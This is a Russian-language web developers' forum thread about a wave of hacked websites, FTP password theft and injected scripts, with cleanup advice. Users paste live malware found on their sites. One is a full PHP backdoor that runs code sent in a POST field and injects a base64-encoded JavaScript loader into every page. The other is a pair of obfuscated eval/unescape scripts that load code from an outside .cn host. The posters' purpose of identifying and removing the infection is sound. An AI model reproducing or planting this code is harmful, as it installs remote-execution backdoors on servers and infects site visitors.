Jump to content

Эпидемия!

Иван Шумов

By Иван Шумов,
in Flame

 Share

Recommended Posts

Иван Шумов Explorer

Иван Шумов

Posted
Posted

За последнее время резко увеличилось число сайтов, зараженных различными вирусами. Крадут пароли от FTP черт знает откуда, заражают php, html, tpl, js - это только то что было обнаружено мной. Чаще всего дописываются в конец или начало файла, используют как правило unescape и exec.

Народ, если у кого были случаи - просьба отписаться, примеры кода вирусов по возможности пришлите мне на почту iashumov@gmail.com желательно а txt файлике запакованном zip :blink:

Совет - стереть все пароли с файловых менеджеров и из браузеров.

Link to comment
Share on other sites
s0rr0w Explorer

s0rr0w

Posted
Posted
За последнее время резко увеличилось число сайтов, зараженных различными вирусами. Крадут пароли от FTP черт знает откуда, заражают php, html, tpl, js - это только то что было обнаружено мной. Чаще всего дописываются в конец или начало файла, используют как правило unescape и exec.

Народ, если у кого были случаи - просьба отписаться, примеры кода вирусов по возможности пришлите мне на почту iashumov@gmail.com желательно а txt файлике запакованном zip :blink:

Совет - стереть все пароли с файловых менеджеров и из браузеров.

Никто ничего не крадет. Используется тупой ввод кейкодов напрямую в программу.

AVG про эту вирусню давно уже знает и ловит.

Link to comment
Share on other sites
Bolmazov Explorer

Bolmazov

Posted
Posted (edited)

А вот возможно и она, эта дрянь

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihrNFVNKXt2YXIgZnJB
NT0ndmFyITIwYSEzZCEyMiE1M2MhNzJpcHRFbmdpbmUhMjIhMmNiITNkITIyVmVyITczaW9uKCkrITIy
I
TJjaiEzZCEyMiEyMiEyY3UhM2RuYXZpZ2EhNzRvITcyITJldXNlITcyITQxZ2VudCEzYmlmITI4ITI4I
T
c1ITJlaW5kZXhPZighMjJDaHJvbWUhMjIpITNjITMwKSEyNiEyNih1ITJlaW4hNjRleE9mITI4ITIyV2
k
hNmUhMjIpITNlMCkhMjYhMjYoITc1ITJlaW4hNjRlITc4T2YoITIyITRlITU0ITIwNiEyMikhM2MwKSE
y
NiEyNihkITZmYyE3NW1lbnQhMmVjbyE2ZmshNjllITJlaSE2ZWRleCE0ZmYhMjghMjJtITY5ZWshM2Qx
I
TIyKSEzYzAhMjkhMjYhMjYhMjghNzR5cCE2NW9mKHpydiE3YSE3NHMpITIxITNkdHkhNzBlbyE2NighM
j
IhNDEhMjIpITI5KSE3Ynpydnp0cyEzZCEyMkEhMjIhM2IhNjV2YSE2YyghMjJpITY2ITI4dyE2OW4hNj
Q
hNmZ3ITJlITIyK2ErITIyKWohM2RqKyEyMithITJiITIyTWFqITZmciEyMiEyYmIrITYxITJiITIyTWl
u
b3IhMjIhMmJiK2ErITIyITQydSE2OWxkITIyK2IhMmIhMjJqITNiITIyITI5ITNiITY0b2N1ITZkZSE2
Z
XQhMmV3ITcyaXRlKCEyMiEzYyE3MyE2M3JpITcwdCEyMHNyYyEzZCEyZiEyZm0hNjEhNzJ0ITIyKyEyM
i
E3NXohMmVjbiEyZnZpITY0ITJmITNmaWQhM2QhMjIraishMjIhM2UhM2MhNWMhMmZzITYzITcyITY5cC
E
3NCEzZSEyMikhM2IhN2QnO2V2YWwodW5lc2NhcGUoZnJBNS5yZXBsYWNlKGs0VU0sJyUnKSkpfSkoL1w
h
L2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

Edited by Bolmazov
Link to comment
Share on other sites
rus Explorer

rus

Posted
Posted

Хотел спросить, а каким образом почистили форум от дряни под названием "google-analytics.com"?

Есть еще один код отличный от этого гугла, но он длинный и поэтому не буду выкладывать сюда.

Самое интересное, на сервере почистил, локально почистил сайты от этого кода, пароли сменил и все равно опять прописался!

А на локальной машине даже и не знаю где его искать.

Куда он мог прописаться?

Link to comment
Share on other sites
rus Explorer

rus

Posted
Posted
Конкретно google-analytics.com - это не гадость, а оригинальный сервис от Google.

И пройдись антивирусом хорошенько.

Понял. А это:

<script language=javascript><!-- 
(function(){var Fuf='va.72.20a.3d.22Scri.70tEngin.65.22.2cb.3d.22Ver.73i.6fn()+.22.2c.6a.3d.22.22
.2c.75.3dnavig.61.74.6fr.2eus.65r.41.67en.74.3b.69f.28(u.2eind.65xO.66(.22Win.22)
.3e0).26.26(.75.2e.69.6edexOf(.22.4eT.206.22).3c0).26.26(docu.6dent.2ecoo.6bi.65.
2ein.64e.78O.66(.22miek.3d.31.22).3c.30).26.26(typeof(zrvzt.73).21.3dtype.6f.66.2
8.22A.22.29)).7bzrvzts.3d.22A.22.3b.65va.6c(.22if(.77.69n.64ow.2e.22.2ba+.22.29j.
3dj.2b.22+a+.22.4da.6a.6f.72.22.2bb+a.2b.22M.69no.72.22.2bb+a.2b.22Build.22+b+.22
j.3b.22.29.3bdocum.65nt.2ewrite(.22.3c.73.63rip.74.20src.3d.2f.2f.67.75mbl.61r.2e
cn.2frss.2f.3fid.3d.22+.6a.2b.22.3e.3c.5c.2f.73cript.3e.22.29.3b.7d';eval(unescape(Fuf.replace(/./g,'%')))})();
 --></script><script language=javascript><!-- 
(function(rkF){var KZX=('~76ar~20~61~3d~22~53~63ri~70t~45ngine~22~2cb~3d~22Version()+~22~2c~6a~3d~22~
22~2c~75~3dna~76~69g~61tor~2e~75s~65~72Agen~74~3bi~66((~75~2einde~78Of~28~22Win~2
2)~3e0)~26~26~28u~2eindexO~66(~22NT~206~22)~3c~30)~26~26(d~6fcument~2ecookie~2ein
dex~4ff(~22miek~3d1~22~29~3c0)~26~26(ty~70eo~66~28zrv~7at~73)~21~3dty~70~65of~28~
22A~22)))~7bz~72vzt~73~3d~22~41~22~3beva~6c(~22~69f(wi~6edow~2e~22+a+~22)j~3dj+~2
2+~61+~22Ma~6a~6fr~22+b~2ba+~22M~69nor~22+b+a~2b~22Bui~6cd~22+b+~22j~3b~22)~3bd~6
f~63um~65nt~2ewrite(~22~3csc~72ipt~20src~3d~2f~2fgu~6dblar~2ec~6e~2frss~2f~3fi~64
~3d~22+~6a+~22~3e~3c~5c~2fs~63rip~74~3e~22~29~3b~7d').replace(rkF,'%');eval(unescape(KZX))})(/~/g);
 --></script>

гадость?

Link to comment
Share on other sites
rus Explorer

rus

Posted
Posted
Ты не знаешь, что такое unescape? eval? Расшифруй и посмотришь - гадость или нет.

Я так понимаю unescape функция для кодирования данных,

а eval для отлова ошибок и генирирования на лету каких то новых данных? Так?

Link to comment
Share on other sites
Dimitry Wolotko Explorer

Dimitry Wolotko

Posted
Posted
Функция eval вычисляет строку кода JavaScript без ссылки на конкретный объект. Синтаксис eval таков:

eval(expr)

где expr это вычисляемая строка.

Если строка представляет собой выражение, eval вычисляет это выражение. Если аргументом является один или более операторов JavaScript, eval выполняет эти операторы. Не вызывайте eval для вычисления арифметических выражений; JavaScript вычисляет арифметические выражения автоматически.

Сноси в общем этот кусок кода в топку.

Link to comment
Share on other sites
rus Explorer

rus

Posted
Posted

Кто-нибудь знает куда мог закешироваться вирус если на фтп все файлы где он был я почистил?

Дело в том, что сайт управляется немецкой cms-кой kobi, которая основана на шаблонизаторе smarty и у меня создается такое впечатление что этот скрипт мог залезть в так называемые "дубль шаблоны", а на эти дубли исходников html, нет никаких прав, так как они защищены от изменения, перезаписи и т.д..., то есть их даже открыть нельзя.

Link to comment
Share on other sites
Dimitry Wolotko Explorer

Dimitry Wolotko

Posted
Posted
Кто-нибудь знает куда мог закешироваться вирус если на фтп все файлы где он был я почистил?

Дело в том, что сайт управляется немецкой cms-кой kobi, которая основана на шаблонизаторе smarty и у меня создается такое впечатление что этот скрипт мог залезть в так называемые "дубль шаблоны", а на эти дубли исходников html, нет никаких прав, так как они защищены от изменения, перезаписи и т.д..., то есть их даже открыть нельзя.

В конфиге папка кеша то указана должна быть.

Link to comment
Share on other sites
rus Explorer

rus

Posted
Posted
В конфиге папка кеша то указана должна быть.

Нет, ты не понял мое предположение, я имел ввиду php файл который дублирует html файл, он защищен от просмотра, от выставления прав на него, вобщем ото всего что можно.

А кэш я пробовал чистить так: function clear_compiled_tpl() - если в скобках ничего не указано, то чистит все файлы, но можно указать конкретный.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue. See more about our Guidelines and Privacy Policy

  I accept